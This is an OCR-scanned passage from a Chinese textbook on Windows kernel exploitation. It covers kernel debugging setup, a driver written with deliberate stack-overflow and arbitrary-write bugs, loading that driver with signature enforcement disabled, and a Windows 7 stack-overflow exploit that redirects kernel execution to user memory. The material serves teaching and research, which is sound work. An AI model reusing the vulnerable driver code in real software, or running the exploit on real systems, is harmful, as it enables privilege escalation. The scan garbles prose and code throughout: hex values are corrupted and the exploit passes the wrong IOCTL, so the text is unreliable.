What type of hardware do you want to install? 


Hardware types: 


| Hard Disk 
(©) CD/DVD Drive 
Floppy Drive 
Fo Network Adapter 
US8 Controller 
中 Sound Card 
回 Parallel Port 
(Ee) Serial Port 
(Sh Printer 
四] Generic SCSI Device 
{E, Trusted Platform Module 


Summary 
2G8 

1 

40 GB 


Using file E:\iso\cn_windows. 


NAT 
Present 
Auto detect 
Present 
Auto detect 
Auto detect 


Add... Remove 


Explanation 
Add a serial port. 


|used for graphics 
v 


le virtual machine 


+ maintaining the 





the user interface, 
spect ratio 


图 6-9-26 


Device status 
Connected 


Connect at power on 


Connection 


团 Use physical serial port: 
Auto detect 
(OO Use output file: 


Use named pipe: 
O 


This end is the server. 


The other end is a virtual machine. 


lO mode 
[Dvield CPU on poll 


Allow the guest operating system to use this serial port in polled 
mode (as opposed to interrupt mode). 
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图 6-9-27 
在 Serial Port 的 右 侧 选择 “Use named pipe” ( 见 图 6-9-28) ， 即 使 用 命名 管道 。 
系统 的 一 种 进程 通信 手段 ， 可 以 简单 认为 是 两 个 进程 共同 映射 一 块 共享 的 内 仓 。 总 之 ， eg 
ware 


提供 了 利用 命名 管道 模拟 串口 的 手段 。 再 选择 “This end is the server” (这 端 是 服务 器 ) 和 “ 
other end is an application” “〈 另 一 端 是 应 用 程序 ) 。 


WAVATeTe [es 


he 


Hardware Options 


Summary Device status 

4GB Connected 

2 Connect at power on 
Hard Disk (SCSD 60 GB 
© cD/DVD (SATA) Using file F:\iso\cn_windows... | “Connection 
Fo Network Adapter OO Use physical serial port: 
USB Controller 


Auto detect 
dy Sound Card 


Using named pipe \\.\pipe\c... OO Use output file: 
2 Browse... 


® Use named pipe: 
\\.\pipe\com_1 
This end is the server. Sp 


The other end is an application. v 


lO mode 
[Jvield CPU on poll 


Allow the guest operating system to use this serial port in polled 
mode (as opposed to interrupt mode). 


图 6-9-28 
我 们 需要 对 主机 端的 Windbg 进 行 设 置 。 选 择 “Attach to kernel” ， 在 右 侧 选择 “COM“” ( 见 图 6 
-9-29) ; 选中 Pipe 并 填写 波 特 率 和 端口 ， 端 口 要 与 VMware 虚拟 机 中 填写 的 一 致 。 


WinDbg (101904.18001) 


Start debugging 


Re Net USB 1394 Lool 罗 | COM BED! pare 
WM Pipe 
Launch executable MD Reconnect 
Nesprs 
Launch executable (advanced) 0 


Supports Time Travel Debugoing 
Baud Rate 


Attach to process 115200 
SuppOTS Time Travel Debwooing port 


Wpipewom 1 
Open dump file i 
加 mial break 
”Open trace file BD Note Connecung to a wmrtual CDM named pepe may requrre elevabon 
Kemel Gebugging using a serial connection is not recommended. Using enwork ketmel debuiooing i faster and more reliable. 
Connect to remote debugger 
Connect to process server 
Attach to kernel 
Launch app package 


Open workspace 
四 [oa 


局 动 调试 后 ，Windbg 会 等 待 客 己 机 连接 。 成 功 连接 后 ，Windbg 给 出 图 6-9-30 和 图 6-9-30 所 示 的 提 
示人 和 信息， 这 是 调试 器 主动 抛 出 的 断 点 。 之 后 即 可 使 用 Windbg 调 试 内 核 。 


Flow Control Reverse Flow Control Preferences 


Microsoft (R) Windows Debugger Version 16.9.18869.1662 AMD64 
Copyright (c) Microsoft Corporation. All rights reserved. 


Opened \\.\pipe\com 1 
Waiting to reconnect... 


图 6-9-30 


Break instruction exception - code 86666663 (first chance) 
来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 求 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 来 率 


* You are seeing this message because you pressed either 
CTRL+C (if you run console kernel debugger) or， 
CTRL+BREAK (if you run GUI kernel debugger), 

* on your debugger machine's keyboard . 
= 
来 
来 


THIS IS NOT A BUG OR A SYSTEM CRASH 
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~ If you didq not lntendq to break into Tne debugger, press tne “g Key, Tnen ~ 
* press the "Enter” key now. This message might immediately reappear. If 让 * 
. does, press "g” and "Enter” again., 


nt!DbgBreakPointwithSstatus+@x1: 
fffff861 49247cd1 c3 


图 6-9-31 


6.9.2 Windows 内 核 漏洞 


内 核 代 码 权 限 的 特殊 性 导致 内 核 漏洞 往往 比 用 户 层 漏洞 具有 更 大 的 价值 。 按 照 攻击 途径 ， 内 核 漏洞 可 

以 分 为 攻击 者 从 本 地 访问 和 攻击 者 从 远程 访问 两 种 。 如 果 是 从 本 地 访问 ， 那 么 攻击 者 需要 先 登录 目标 

计算 机 ， 这 种 登录 都 是 以 低 权 限 账户 进行 的 。 因 此 ， 本 地 访问 的 内 核 漏洞 一 般 用 于 权限 提升 ， 这 种 情 

况 在 后 渗透 测试 的 权限 维持 中 较为 常见 。 而 可 以 远程 访问 的 内 核 漏洞 更 危险 ， 如 著名 的 CVE-201 人 ry 
(MS-07-010) 、CVE-2019-0708 竺 都 是 威力 极 大 的 可 以 在 远程 获取 系统 最 高 权限 的 漏洞 。 


但 是 并 不 是 所 有 的 内 核 漏洞 都 是 可 以 被 有 效 利用 的 。 一 般 来 说 ,漏洞 仓 在 “ 品 相 ”的 说 法 ， 有 些 品 相 
不 佳 的 漏洞 虽然 可 以 触 友 但 是 在 利用 时 却 比 较 困 难 甚 至 只 是 理论 上 可 以 利用 。 那 么 这 些 漏洞 往往 只 能 
实现 拒绝 服务 的 效果 。 按 照 MSRC 现 在 的 标准 ， 本 地 拒绝 服务 已 经 不 被 作为 漏洞 接受 了 。 


一 般 能 远程 触 点 的 内 核 漏洞 都 是 位 于 各 种 网 络 协议 村 的 内 核 驱动 程序 中 ， 如 CVE-2017-0144 漏 洞 位 
于 处 理 SMB 的 内 核 驱动 srv.sys 中 ，CVE-2019-0708 漏 洞 位 于 处 理 RDP 协 议 的 内 核 驱 动 程序 termdd. 
中 。 用 于 权限 提升 的 内 核 漏洞 往往 存在 于 诸如 Windows GDI/GUI 内 核 模块 win32k.sys、Windows” 
内 核 核心 模块 ntoskrnl.sys 等 中 。 这 些 模块 中 的 漏洞 需要 在 本 地 以 Native API 的 形式 进行 触 友 。 此 
外 ， 系 统 自 带 或 者 第 三 方 驱 动 程序 中 的 漏洞 需要 调用 DeviceloControl 函 数 ， 通 过 1IRP 的 形式 进行 触 


2 


本 书 并 不 是 一 本 专门 讲述 Windows 内 核 漏洞 的 书籍 ， 因 此 在 内 容 安排 上 仪 做 抛砖引玉 之 用 ， 不 会 涉及 

太 多 的 技术 细节 。 同 时 ， 在 实际 环境 下 漏洞 利用 技术 变化 很 快 ， 可 能 在 作者 写作 的 时 候 还 鲜 为 人 知 的 

新 技术 ， 到 了 印 成 铅字 拿 到 读者 手 上 时 已 经 是 过 时 的 旧闻 了 。 简 要 来 说 ， 微 软 会 在 每 次 Windows 系 统 

的 大 版 本 更 新 中 增加 对 已 知 的 通用 漏洞 利用 技术 的 防护 。 比 如 ， 针 对 Win32k.sys 漏 洞 高 友 而 为 沙 箱 进 

程 增加 Win32k Filter， 使 得 常见 的 GDI/GUI 调 用 无 法 执行 ; ne 
Header Cookie， 针 对 内 核 态 执行 用 户 态 shellcode 启 用 SMEP; 针对 池 风 水 布局 引入 LFH、 新 

的 分 配 算法 ; 针对 GDI 对 象 滥 用 引入 内 和 存 隔离 等 。 由 此 可 见 ， 攻 防 是 一 个 动态 的 过 程 。 


t 


6.9.2.1 简单 的 Windows 了 驱动 开发 入 门 


按照 时 间 线 ， 微 软 为 驱动 开发 提供 了 三 种 模型 : NT 式 、WDM、WDF。 对 于 我 们 的 目标 来 说 ，NT 式 
驱动 程序 已 经 足够 使 用 。 下 面 介 绍 如 何 配置 一 个 驱动 开 肥 环境。 


首先 ， 需 要 安 六 Visual studio。Visual Studio 是 微软 官方 推荐 的 Windows 驱 动 开发 IDE， 鉴 于 驱动 
调试 环境 涉及 Windows 10， 因 此 推荐 使 用 Visual studio 2015 及 以 上 版 本 进行 开 有 友 ， 同 时 需要 安 委 
Windows 10 以 上 版 本 的 Windows Driver Kit (WDK) 。WDK 提 供 了 驱动 开发 所 必要 的 头 文件 、 库 
文件 、 工 具 链 等 环境 。WDK 可 以 在 微软 的 Hardware Dev Center 中 获取 到 ， 其 同时 提供 了 如 何 安装 
和 配置 方面 的 信息 ， 因 此 有 关 WDK 安 装 的 方法 这 里 不 再 乾 述 。 


当成 功 安装 WDK 后 ， 打 开 Visual studio， 选 择 创 建新 项 目 ， 会 看 到 图 6-9-32 所 示 的 情况 。 因 为 WDK 
10 默 认 使 用 WDF 驱 动 模型 ，WDF 驱 动 模型 把 驱动 程序 划分 成 为 内 核 模 式 驱动 程序 和 用 户 模式 驳 动 程 
序 两 部 分 ， 提 出 了 KMD 和 和 UMD 两 个 概念 。 微 软 如 此 设计 的 初衷 是 把 老式 内 核 驱动 中 与 内 核 和 硬件 关 
联 不 大 的 代码 抽取 到 用 户 态 ， 从 而 提高 效率 和 减少 攻击 面 。 如 果 只 是 想 要 编写 简单 的 NT 式 驱 动 ， 选 择 


“Kernel Mode Driver, Empty (UMDF V2) ” 即 可 。 
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项 目 创建 完毕 ， 融 可 以 开始 漏洞 程序 的 编写 了 。 竺 移 为 驱动 程序 编写 一 个 入 口 阔 数 。 因 为 对 于 程序 来 
说 ， 无 论 是 普通 的 Win32 程 序 还 是 DLL 程序 ， 都 需要 一 个 国 数 作 为 入 口 点 ， 这 个 入 口 点 会 移 得 到 调用 
并 执行 。 对 于 Windows 驱 动 程序 而 言 ， 这 个 入 口 点 拥有 固定 的 格式 ( 见 图 6-9-33) ， 一 般 链 接 器 黑 
认 其 国 数 名 称 为 DriverEntry。 


排序 依据 | 赋值 ”| 党 搜索 (CW 日 
9 Kernel Mode Driver (KMDF) +4 类 型 : Visual C++ 
An empty project using the Kemel-Mode 


9 . Kernel Mode Driver, Empty (KMDPF) 志 让 Driver Framework (KMDF). Builds Universal 
drivers by default, 


MFC/ATL 2 User Mode Driver (UMDF V2) 
4 测试 


a 9 User Mode Driver Empty (UMDF V2) 


位 置 (U: 济 (B)- | 
解决 方案 名 称 (M) KMDF Driver1 为 解决 方案 创建 目录 (D) 
站 新 建 GIT 存储 库 (G) 


Wy _ 
图 6-9-32 


_In_ PDRIVER OBJECT DriverObject, 
_In_ PUNICODE_STRING RegistryPath 


图 6-9-33 
DriverEntry 消 数 的 参数 DriverObject 表 示 当 前 驱动 程序 的 驱动 对 象 。 因 为 对 于 Windows 驱 动 开 友 来 
说 ， 驱 动 程序 (Driver) 是 依附 于 设备 (Device) 而 存在 的 ，IRP 操 作 的 目标 都 是 设备 而 设备 实际 执 
行 的 代码 才 是 驱动 程序 。 


一 般 驱 动 程序 会 创建 一 个 或 多 个 设备 对 象 ， 这 些 设备 对 象 会 与 本 驱动 的 驱动 对 象 相关 联 。 多 个 设备 对 
象 组 成 堆 蔷 的 结构 见 图 6-9-34， 当 IRP 到 达 某 个 设备 对 象 时 实际 执行 的 是 与 之 相关 联 的 驱动 程序 代 
码 。 


EE 


EE 


EN 


图 6-9-34 
因此 ， 我 们 的 驱动 程序 需要 编写 入 口 辫 数 如 下 : 


#inctude <ntddk.h> 
#define DEBUG FAL: 


PDEVICE_0BJECT Device0bjec 
UNICODE_STRING SymboLLinl 站 9 »; 


TATUS DispatchSucess AR OBJECT Deviceptr，PIRP Irpptr) { 
= STATUS_SUCCESS; 


i es 9); 
return STATUS_SUCCESS; 


NTSTATUS DispatchControl(PDEVICE_OBJECT Deviceptr, PIRP Irpptr) { 
UNREFERENCED_PARAMETER(Deviceptr); 


PIO_STACK_LOCATION CurirpStack; 
ULONG ReadLength, WriteLength; 
NTSTATUS status = STATUS_UNSUCCESSFUI 


CurIrpStack = IoGetCurrentIrpSta ation(Irl 人 ‘2H 
ReadLength = CurIrpStack->Paraneters.Read.Length 
WriteLength = CurIrpStack->parameters.Write.Len i 


// Vulnerability code 
} 


NTSTATUS DispatchUnload(PDRIVER_OBJECT DriverObject) { 
UNREFERENCED_PARAMETER(DriverObject); 


ToDeleteDevice(DeviceObject); 
ToDeleteSynbolicLin| 本 mbolLinkName) ; 
return STATUS_SUCCESS; 

} 


NTSTATUS 
DriverEntry(_In_ PORIVER_OBJECT DriverObject, _In. PUNICODE_STRING Registrypath) { 
UNICODE_STRING DeviceObjName = { 6 }; 
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NTSTATUS status = 0; 


UNREFERENCED_PARAMETER(RegistryPath); 


#if DEBUG 
__debugbreak(); 
#endi 


RtlInitUnicodeString(SDeviceObjName, L"\\Device\\target_device"); 
status = IoCreateDevice(DriverObject, 
9 


5Device0bjNane 
FILE_DEVICE_UNKNOWN ， 
9， 

FALSE， 


&Device0bject); 


if (!NT_SUCCESS(status)) { 
DbgpPrint("Create Device Failed\n"); 
RtlFreeUnicodeString(S&DeviceObjName); 
return STATUS_FAILED_DRIVER_ENTRY; 

} 

Device0bject->FLags |= DO_BUFFERED_IO; 


RtlInitUnicodeString(&SymbolLinkName, L"\\??\\target_symbolic"); 
status = IoCreateSymbolicLink(&SymbolLinkName, &DeviceObjName); 


if (!NT_SUCCESS(status)) { 
DbgPrint("Create SymbolicLink Failed\n"); 
IoDeLeteDevice(Device0bject); 
RtlFreeUnicodeString(&SymbolLinkName); 
RtlFreeUnicodeString(&DeviceObjName); 
return STATUS_FAILED_DRIVER_ENTRY ; 

} 


for (INT i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) { 
Driver0bject->MajorFunction[i] = DispatchSucess; 
} 
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchControL; 
Driver0bject->DriverUnLoad = (PDRIVER_UNLOAD)DispatchUnload; 
return STATUS_SUCCESS ; 
} 


首先 ， 使 用 loCreateDevice 逆 数 创建 一 个 设备 对 象 与 当前 驱动 对 象 进行 关 联 。 然 后 ， 需 要 通 createsymbolictink 
国 数 创 建 一 个 符号 链接 ， 创 建 这 个 符号 链接 对 象 是 为 了 将 之 前 创建 的 设备 对 象 民 让 露 给 

用 户 态 。 在 默认 情况 下 ， 设 备 对 象 位 于 \Device 目 录 ， 而 Win32 API 只 能 访问 \GLOBAL? ? 目录 中 的 

内 容 。 通 过 在 \GLOBAL? ? 中 创建 符号 链接 指向 \Device 中 的 设备 对 象 ， 可 以 使 得 Win32 API 访 问 这 


Me 


再 为 Device 设 备 指定 DO_BUFFERED 10O 标 志 位 ， 表 明 这 个 设备 使 用 缓冲 模式 与 用 户 态 进行 数据 交 
[= /Ile lo DE 


需要 为 驱动 对 象 设置 分 友 遂 数 ， 在 通过 不 同 冰 数 对 设备 对 象 友 送 请 求 时 驱动 程序 会 收 到 市 有 不 

et 青 求 包 。 MajorCode 由 消 数 内 部 自动 设置 ， 如 使 用 CreateFile 函 数 时 ， 驱 动 程序 
会 收 到 MajorCode 为 IRP_MJ」CREATE 的 请 求 ， 使 用 DeviceloControl 冰 数 时 ， 驱 动 程序 会 收 至 I ee 
ele [= 

为 IRP_MJ_DEVICE_CONTROL 的 请 求 。 驱 动 程序 收 到 这 些 IRP 请 求 时 会 目 动 调用 对 应 的 9 分 可 

数 。 程 序 中 只 需要 设置 MajorCode 为 IRP MJ DEVICE CONTROL 的 分 发 函数 即 可 ， 其 他 
Mk]leldaV laleln 
可 以 设 为 直接 返回 


此 外 ， 迎 数 中 没有 使 用 到 的 参数 需要 使 用 UNREFERENCED PARAMETER 宏 进行 表明 。 Ee 
_PARAMETER 安 其 实 是 一 个 空 安 ， 因 为 驱动 程序 在 编译 时 会 把 警告 视 为 错误 ， 如 果 不 这 样 处 理 ， 
则 无 法 通过 编译 。 


6.9.2.2 编写 栈 浇 出 示例 


下 面 在 IRP_MJ_DEVICE_CONTROL 的 MajorFunction 中 增加 实际 的 漏洞 代码 。 我 们 先 编写 栈 溢出 漏 
洞 示例 代码 ， 需 要 从 用 户 态 接收 传 入 的 数据 为 此 我 们 设计 如 下 交互 结构 ， 这 样 可 以 存放 传递 的 数据 与 
数据 的 尺寸 


typedef struct _CONTROL_PACKET { 
union { 


struct { 
INT64 BufferSize; 
INT8 Buffer[100]; 
}_soF; 
} Parameter; 
} CONTROL_PACKET, *PCONTROL_PACKET; 


再 设计 一 个 IOCTL 代 码 ， 这 个 代码 会 在 DeviceloControl 函 数 中 进行 传递 ， ME 
的 MajorFunction 中 接收 。 


trefine CODF SOF AxAA3 
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mr 一 一 一 一 ~ 


#define SOF_CTL_CODE \ 
(ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN, CODE_SOF, METHOD_BUFFERED, FILE_READ_DATA|FILE_WRITE_DATA) 


IOCTL 代 码 实际 上 只 是 个 整数 值 ， 但 是 按 意 义 分 为 4 个 域 。CTL CODE 安 只 是 进行 位 移 操 作 ， 可 以 用 


来 定义 我 们 目 己 的 IOCTL 代 码 。 因 为 我 们 的 驱动 程序 实际 上 并 不 驱动 任何 硬件 ， 所 以 需要 指 二 


_UNKNOWN 类 型 。METHOD BUFFERED 说 明了 我 们 将 使 用 缓冲 MO 模型 进行 交互 ， 而 CODE 
_SOF 是 我 们 需要 设 定 的 一 个 值 ， 只 要 不 与 Windows 保 留 值 相 冲 突 ， 这 个 值 的 内 容 完 全 可 以 自 定义 。 


同时 ， 我们 在 IRP_MJ DEVICE CONTROL 的 MajorFunction、DispatchControl 纹 数 中 增加 以 下 代 
码 。 


NTSTATUS DispatchControl(PDEVICE_OBJECT DevicePptr, PIRP Irpptr) { 
UNREFERENCED_PARAMETER(DevicePptr); 


PIO_STACK_LOCATION CurIrpStack ; 
ULONG ReadLength, WriteLength; 
PCONTROL_PACKET PacketPptr = NULL; 
INT8 StackBuffer[9x10] ; 

INT64 BufferSize = 0; 


CurIrpStack = IoGetCurrentIrpStackLocation(IrpPtr); 
ReadLength = CurIrpStack->Parameters .Read .Length; 
WriteLength = CurIrpStack->Parameters .Write.Length ; 


// Vulnerability code 
PacketPptr = (PCONTROL_PACKET)IrpPptr->AssociatedIrp.SystemBuffer; 


BufferSize = Packetptr->Pparameter._SOF .BufferSize; 
RtlCopyMemory(StackBuffer, PacketPptr->Pparameter._SOF.Buffer, BufferSize); 


IrpPtr->IoStatus .Status = STATUS_SUCCESS ; 
IrpPtr->IoStatus .Information = sizeof(CONTROL_PACKET) ; 


IoCompleteRequest(Irpptr, 0); 
return STATUS_SUCCESS ; 


这 个 函数 接收 由 IMO 管 理 器 传递 的 IRP 包 作为 参数 。1IRP 包 实际 上 是 一 个 多 层 的 栈 结构 ， 为 此 需要 使 用 
[ec eNetdEKeleciiell 
来 获取 当前 IRP 栈 。|RP 栈 存在 一 个 名 为 Parameters 的 联合 体 ， 这 个 联 
合体 会 根据 IRP 的 类 型 使 用 不 同 的 结构 。 这 里 ， 因 为 我 们 使 用 的 是 Buffer VO 的 模式 ， 所 以 可 以 通过 
rpPtr 
->Associatedlrp.SystemBuffer 来 获取 数据 的 指针 ， 然 后 通过 在 栈 中 声明 一 块 缓 ) 中 区 和 调用 


时 二 RtlCopyMemory 
疯 数 的 形式 实现 栈 ; 益 出 的 例子 。 


6.9.2.3 编写 任意 地 址 写 示 例 
与 栈 溢出 类 似 ， 我 们 同样 设计 一 个 传输 数据 结构 来 传递 数据 和 定义 一 个 IOCTL 值 : 


#define CODE_WAA 9x891 


#define WAA_CTL_CODE \ 
(ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN, CODE_WAA, METHOD_BUFFERED, FILE_READ_DATA|FILE_WRITE_DATA) 


typedef struct _CONTROL_PACKET { 
union { 
struct { 
INT64 Where; 
INT64 What; 
}_AAW; 
} Parameter; 
} CONTROL_PACKET, *PCONTROL_PACKET; 


同样 ， 在 IRP_MJ DEVICE CONTROL 的 MajorFunction 中 增加 漏洞 代码 ， 现 一 个 任意 地 址 
写 任意 值 的 示例 (write-anything-anywhere) ， 具体 细 节 不 再 歼 述 


NTSTATUS DispatchControl(PDEVICE_OBJECT Deviceptr, PIRP Irpptr) { 
UNREFERENCED_PARAMETER(DevicepPtr); 


PIO_STACK_LOCATION CurIrpStack; 
ULONG ReadLength, WriteLength; 
PCONTROL_PACKET PacketPtr = NULL; 
INT64 WhatValue = 0; 

INT64 WhereValue = 0; 


CurIrpStack = IoGetCurrentIrpStackLocation(IrpPtr), 
ReadLength = CurIrpStack->Parameters.Read .Length ; 
WriteLength = CurIrpStack->Parameters .Write.Length 


// Vulnerability code 
PacketPptr = (PCONTROL_PACKET)IrpPptr->AssociatedIrp.SystemBuffer; 


WhatValue = PacketPptr->Pparameter._AAW.What; 
WhereValue = PacketPptr->Parameter._AAW .Where; 


*((PINT6d4)WhereValue) = WhatValue: 
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IrpPtr->IoStatus .Status = STATUS_SUCCESS ; 
IrpPtr->IoStatus .Information = sizeof(CONTROL_PACKET); 
IoCompLeteRequest(IrpPtr，0); 

return STATUS_SUCCESS ; 


6.9.2.4 加 载 内 核 驱动 程序 


使 用 的 示例 都 是 NT 式 驱 动 程序 ， 所 以 只 介绍 NT 式 驱 动 程序 的 加 载 方式 。NT 式 驱动 程序 的 加 载 比 较 简 
单 ， 实 际 上 是 通过 注册 为 系统 服务 进行 加 载 的 。Windows 操 作 系 统 的 服务 由 服务 控制 管理 进程 上 
Service 
Control Manager) 进行 管理 ， 其 进程 名 为 services.exe， 其 内 部 也 是 通过 调用 NtLoadDriver 函 


数 进行 驱动 加 载 的 。 当 然 ， 内 核 驱 动作 为 一 种 特殊 权限 的 代码 不 是 每 个 进程 都 能 通过 汕 用 下 
@lc| 站 Ver 
国 数 进行 加 载 的 ， 和 ( 


Privilege 
一 般 只 有 System 权限 的 Token 才 具有 此 特权 。 


本 节 还 是 通过 最 正规 的 SCM 注 册 服 务 的 万 式 进行 驱动 加 载 。 


hServiceManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); 
if (NULL == hServiceManager) { 
printf("OpenSCManager Fail: %d\n", GetLastError()); 


ervice = CreateServiceA(hServiceManager, 


SERVICE_ALL_ACCESS, 
SERVICE_KERNEL_DRIVER, 
SERVICE_DEMAND_START, 
SERVICE_ERROR_IGNORE, 
DriverPath, 

NULL, 

NULL, 

NULL, 

NULL, 

NULL); 


if (NULL == hDriverService) { 
ErrorCode = GetLastError(); 
if (ErrorCode != ERROR_IO_PENDING && ErrorCide != ERROR_SERVICE_EXISTS) { 
printf("CreateService Fail: %d\n", ErrorCode); 
ErrorExit(); 


Lse { 
printf("Service is exist\n"); 


hDriverService = OpenServiceA(hServiceManager, ServiceName, SERVICE_ALL_ACCESS); 


if (NULL == hDriverService) { 
printf("OpenService Fail: %d\n", GetLastError()); 
return 0; 

1 


ErrorCode = StartServiceA(hDriverService, NULL, NULL); 
if (FALSE == ErrorCode) { 

ErrorCode = GetLastError(); 

if (ErrorCode != ERROR_SERVICE_ALREADY_RUNNING) { 


printf("StartService Fail: %d\n", ErrorCode); 


先 调用 OpenSCManager 国 数 打 开 SCM ， 获 取 一 个 句柄 ， 册 使 用 这 个 句柄 调用 Create9Service 函 数 创 
建 一 个 服务 。 如 果 这 个 服务 乙 前 已 经 创建 ，Create9ervice 国 数 会 到 回 NULL。 这 样 需要 通 ER 
国 数 去 打开 这 个 已 人 存 企 的 服务 。 当 获取 到 服务 的 句柄 后 ， 下 一 步 丈 是 局 动 服务 ， 其 对 应 的 驱动 各 

序 也 束 随 之 加 载 了 。 


由 于 Windows 高 版 本 中 存在 DSE (Driver Signature Enforcement) 保护 ， 我 们 无 法 直接 加 载 自己 
编写 的 示例 驱动 程序 。 DSSE 是 一 种 内 核 模 块 强制 釜 名 的 措施 ， 它 会 阻止 未 经 等 名 的 驱动 程序 的 加 载 。 

如 果 试 图 加 载 未 经 签名 的 驱动 程序 ， 会 在 启动 服务 的 时 候 返 回 失败 。 为 此 ， 需 要 以 禁用 DSE 的 模式 进 

行 局 动 。 


在 Windows 系 统 中 进入 “ 设 选择 “更 新 和 安全 一 恢复 一 高 级 启动 ”， 见 图 6-9-35; 选择 
“疑难 解答 一 高 级 选项 " 


恢复 
重 置 此 电脑 


如 果 电 脑 未 正常 运行 ， 重 置 电脑 可 能 会 解决 问题 。 重 置 时 ， 可 以 选 
择 保 留 个 人 文件 或 出 除 个 人 文件， 然后 重新 安装 Windows。 
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高 级 启动 


通过 设备 或 磁盘 (如 U 盘 或 DVD) 启 动 ， 更 改 Windows 启动 设置 ,或 
者 从 系统 映像 还 原 Windows。 这 将 重新 启动 电脑 。 


图 6-9-36 
接 下 来 选择 “启动 设置 一 7) 禁用 驱动 程序 强制 签名 ”， 见 图 6-9-37。 


图 6-9-37 


6.9.2.5 Windows 7 内 核 漏洞 利用 


我 们 选择 Windows 7 作为 Windows 内 核 漏洞 利用 的 开始 ， 因 为 Windows 7 操作 系统 缺少 对 于 内 核 漏 
洞 利用 的 防护 措施 。 可 以 说 ，Windows 7 对 于 内 核 漏洞 利用 来 说 是 不 设防 的 。 


Windows 7 对 于 内 核 利用 来 说 的 有 利 条 件 如 下 。 首 先 ， 内 核 空间 中 存在 可 执行 内 存 ， 里 然 Windows 

已 经 引入 了 DEP (数据 执行 保护 ) ， 但 是 并 没有 把 该 漏洞 缓解 措施 引入 到 内 核 空 间 中 。 可 执行 的 内 
核 池内 存 为 我 们 存放 shellcode 提 供 了 想象 空间 。 其 次 ，Windows 7 内 核 没 有 对 ring0 权 限 与 ring3 权 
限 的 内 存 页 进行 执行 层面 上 的 隔离 。 换 而 言 乙 ， 我 们 可 以 事先 在 用 户 态 通 过 VirtualAlloc 等 函数 手动 
映射 具有 执行 权限 的 内 存 页 到 用 户 空间 中 ， 然 后 在 从 内 核 空 间 中 跳 到 我 们 映射 的 用 户 内 存 页 去 执行 
(必须 处 于 同一 个 进程 上 下 文 ) ， 同 样 为 存放 shellcode 提 供 了 想象 空间 。 


另外 ， 一 些 Native API 可 以 泄露 内 核 模 块 的 地 址 。 这 些 Native APl 本 来 并 不 是 直接 提供 给 用 户 使 用 
的 ， 并 且 Native API 与 部 分 内 核 API 存 在 对 应 关系 ， 因 此 部 分 APl 设 计 并 没有 考虑 到 内 核 地 址 泄露 的 问 
题 。 如 NtQuerySystemlnformation 函 数 的 SystemModulelnformation 功 能 码 可 以 获取 内 核 模 块 的 
基地 址 信息 ( 见 图 6-9-38) 。 


C++ 
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__kernel entry NTSTATUS NtQuerySystemIinformation( 
IN SYSTEM INFORMATION CLASS SystemIinformationClass, 
OUT PVOID SystemInformation, 
IN ULONG SystemInformationLength, 
OUT PULONG ReturnLength 


图 6-9-38 


在 生成 Windows 7 驱动 程序 示例 的 代码 时 ， 注 意 设置 Visual Studio 项 目的 目标 平台 ， 需 要 把 Target 
OS Version 设 置 为 Windows 7， 把 Target Platform 设置 为 Desktop ( 见 图 6-9-39) 。 


v 平台 (P): 活动 (x64) 
Target OS Version 
Torget Platform 
_NT_TARGET_VERSION 


Build Package 
Override default Runtime Library 


USB Connector Manac 
USB Role Switch Drive 
USB Device Emulation 
USB Type-C Port Cont 

b Driver Install 

b> 生成 事件 

b Stamplnf 


b Inf2Cat Target OS Version 
b Driver Signing v | Target operating version that this driver will be built for. 
》 


图 6-9-39 
1. 内 核 栈 溢出 利用 


内 核 栈 溢 出 的 利用 比较 人 简单， 只 需 覆 匡 内 核 栈 的 返回 地 址 即 可 。 读 者 已 经 对 栈 洪 出 具有 相当 的 了 解 ， 
因此 不 再 费 述 。 通 过 反 汇 编 ， 我 们 分 析 内 核 溢出 空间 为 0x28 字 蔬 ， 因 此 编写 以 下 代码 : 


hDevice = CreateFile(DEVICE_SYMBOLIC_NAME, 
GENERIC_ALL， 
9， 
0， 
OPEN_EXISTING, 
FILE_ATTRIBUTE_SYSTEM, 
0); 
if (hDevice == INVALID_HANDLE_VALUE) { 
DWORD ErrorCode = GetLastError(); 
printf("CreateFile = %d\n", ErrorCode); 
return 0; 


} 


Packet .Parameter._SOF .Buffersize = Qx28 + Qx8; 
for (size_t i = 0; i < 0x28; i++) { 

Packet .Parameter._SOF.Buffer[i] = Qx41; 
} 


Address = VirtualAlloc(NULL, OQx1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 
RtlCopyMemory(Address, "\xCC\xCC", 2); 


*(PINT64)&Packet .Parameter._SOF.Buffer[9x28] = (INT64)Address; 


if (!DeviceIoControl(hDevice, 

WAA_CTL_CODE, 
&Packet, 
sizeof(Packet), 
S&Packet, 
sizeof(Packet), 
&BytesReturn, 
0)) { 

DWORD ErrorCode = GetLastError(); 

printf("DeviceIoControL = %d\n", ErrorCode); 

return 0; 


在 利用 代码 中 ， 我 们 先 调用 CreateFile 函 数 传递 设备 的 符号 链接 名 称 ， 打 开设 备 对象 并 获得 一 个 名 
柄 。 再 填充 0x28 字 节 的 垃圾 数据 ，0x28 是 通过 分 析 栈 溢出 点 得 出 的 。0x28 字 节 后 是 我 们 实际 覆盖 的 
返回 地 址 ， 这 里 需要 先 在 用 户 态 通过 VirtualAlloc 消 数 来 分 配 一 块 可 执行 的 内 存 ， 并 把 返回 地 址 设置 
为 这 块 内 存 的 地 址 。 
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当 内 核 驱动 执行 复制 操作 时 ， 会 将 栈 上 的 返回 地 址 覆 苹 为 用 尸 态 分 配 的 可 读 写 执行 的 内 存 地 址 。 其 中 
隐 式 的 原因 是 因为 内 核 驱 动 的 进程 上 下 文 与 调用 进程 相同 。 


kd> !process fffffa80 1ba2b7d6 0 

PROCESS fffffa89lba2b7d0 
SessionId: 1 Cid: gbbc Peb: 7fffffdb609 ParentCid: Qd60 
DirBase: 168fcQ00 ObjectTable: fffff8aQ01lff3b80 HandleCount: 8. 


Image: usermode.exe 


kd> .process 

Implicit process is now fffffa89`1ba2b7d9 

kd> !process fffffa89`1lba2b7d0 0 

PROCESS fffffa80lba2b7d0 
SessionId: 1 Cid: gbbc Peb: 7fffffdb909 ParentCid: Qd60 
DirBase: 168fcQ00 ObjectTable: fffff8a091ff3b86 HandleCount: 8. 
